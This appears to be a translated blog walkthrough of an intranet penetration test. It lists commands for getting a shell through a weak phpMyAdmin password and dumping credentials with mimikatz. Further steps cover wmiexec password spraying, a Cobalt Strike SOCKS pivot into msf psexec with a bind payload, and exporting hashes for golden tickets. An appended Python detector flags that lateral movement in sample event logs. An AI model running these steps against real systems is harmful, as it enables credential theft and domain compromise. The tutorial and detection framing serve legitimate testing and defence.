Intranet Penetration: Intranet Hosts With and Without Internet Access

Preface

During a penetration test, after taking down a host in the domain, the other hosts on the intranet sometimes have internet access and sometimes do not. If they do, the regular penetration-testing workflow can continue. If they do not, the compromised host must be used as a springboard (pivot), using SOCKS or another tunnelling method to reach the hosts that have no internet access.

Hosts in the domain have a network


Attack process

Starting from the externally exposed web service on the webserver host in the domain, work toward obtaining domain controller privileges.
Once the webserver has been compromised:
0x01:

  • Get a shell through a weak phpMyAdmin password

0x02:

  • Generate an msf payload and listener, get a session and run getsystem; upload the mimikatz binary (upload '/root/x64' c:\test) and run mimikatz with
    privilege::debug and sekurlsa::logonpasswords

0x03:

  • Batch-test for weak passwords with wmiexec against the hosts ending in .29, .31 and .32

0x04:

  • Obtain access to .29, .31 and .32, get reverse sessions in msf and run getsystem

0x05:

  • Batch-test for weak passwords with wmiexec; the .21 host hits
  • execute -f cmd.exe -H -i

0x06:

  • Export all hashes for golden and silver tickets

Hosts in the domain have no network

Msf

  • After taking the webserver, I found it sits on two network segments, 192.168.3.31 and 192.168.230.131;
    assume 192.168.230.131 is the external-facing network and 192.168.3.31 is the internal one.
  • I also found that none of the other intranet hosts had internet access; only the webserver did.
  • At this point the webserver can be used as a springboard: open a SOCKS proxy with CS and attack through it with msf.

Operating procedures

# Cobalt Strike

  • Start the team server, create a listener, generate the payload, get the beacon online and escalate privileges
  • In CS, start a SOCKS4 proxy on the pivot's listening port, then point msf at it with setg Proxies
  • Copy the socks4:192.168.230.133:xxxxx string into msf

msfconsole

  • Load the proxy: setg Proxies socks4:192.168.230.133:xxxxx
  • Attack modules: ms17010, ms14068, smb psexec, etc.
  • use exploit/windows/smb/psexec

# Use a bind payload so hosts without internet access can be reached

  • set payload bind_tcp
  • set smbuser administrator
  • set smbpass admin!@#45
  • Upload mimikatz: upload '/root/x64' c:\test
  • mimikatz privilege::debug sekurlsa::logonpasswords
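The lateral-movement steps above (batch weak-password testing with wmiexec across several hosts, then psexec over SMB through the pivot) leave a recognisable trace in Windows event logs. As an added example, not part of the original post, the detector below runs over constructed Security (4624/4625) and System (7045) records: it flags a source that fails logons against several hosts and then obtains a network logon (spraying), and a service install that follows a network logon on the same host within a short window (the psexec pattern). Hostnames, IPs and service names are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4624/4625 come from the target's
# Security log, 7045 (new service installed) from its System log.
EVENTS = [
    {"ts": "2020-10-19T10:00:01", "id": 4625, "host": "ws29", "src": "192.168.3.31", "user": "administrator"},
    {"ts": "2020-10-19T10:00:02", "id": 4625, "host": "ws31", "src": "192.168.3.31", "user": "administrator"},
    {"ts": "2020-10-19T10:00:03", "id": 4625, "host": "ws32", "src": "192.168.3.31", "user": "administrator"},
    {"ts": "2020-10-19T10:00:04", "id": 4624, "host": "ws21", "src": "192.168.3.31", "user": "administrator", "logon_type": 3},
    {"ts": "2020-10-19T10:00:09", "id": 7045, "host": "ws21", "service": "MXyQjdKp", "path": "%SYSTEMROOT%\\MXyQjdKp.exe"},
    # Benign: a scheduled agent install long after an unrelated network logon.
    {"ts": "2020-10-19T11:30:00", "id": 4624, "host": "fs01", "src": "192.168.3.40", "user": "backup", "logon_type": 3},
    {"ts": "2020-10-19T12:05:00", "id": 7045, "host": "fs01", "service": "BackupAgent", "path": "C:\\Program Files\\Backup\\agent.exe"},
]

def detect_spray(events, min_hosts=3):
    """Sources that failed logons on >= min_hosts distinct hosts and later got a network (type 3) logon."""
    failed, hits = defaultdict(set), {}
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] == 4625:
            failed[e["src"]].add(e["host"])
        elif e["id"] == 4624 and e.get("logon_type") == 3 and len(failed[e["src"]]) >= min_hosts:
            hits[e["src"]] = {"failed_hosts": sorted(failed[e["src"]]), "success_host": e["host"], "user": e["user"]}
    return hits

def detect_remote_service(events, window_s=60):
    """7045 service installs within window_s seconds of a network logon on the same host."""
    logons, alerts = defaultdict(list), []  # host -> [(time, source ip)]
    for e in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(e["ts"])
        if e["id"] == 4624 and e.get("logon_type") == 3:
            logons[e["host"]].append((t, e["src"]))
        elif e["id"] == 7045:
            # 7045 carries no source address, so correlate on host and time only.
            recent = [src for lt, src in logons[e["host"]] if t - lt <= timedelta(seconds=window_s)]
            if recent:
                alerts.append({"host": e["host"], "service": e["service"], "path": e["path"], "from": recent[-1]})
    return alerts

if __name__ == "__main__":
    for src, info in detect_spray(EVENTS).items():
        print(f"spray from {src}: failed on {info['failed_hosts']}, then logged on to {info['success_host']}")
    for a in detect_remote_service(EVENTS):
        print(f"remote service install on {a['host']}: {a['service']} ({a['path']}) after logon from {a['from']}")
```

Tune min_hosts and window_s to the environment; the service-name check is deliberately absent because psexec-style tools randomise it.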


Source: blog.csdn.net/weixin_44110913/article/details/109149878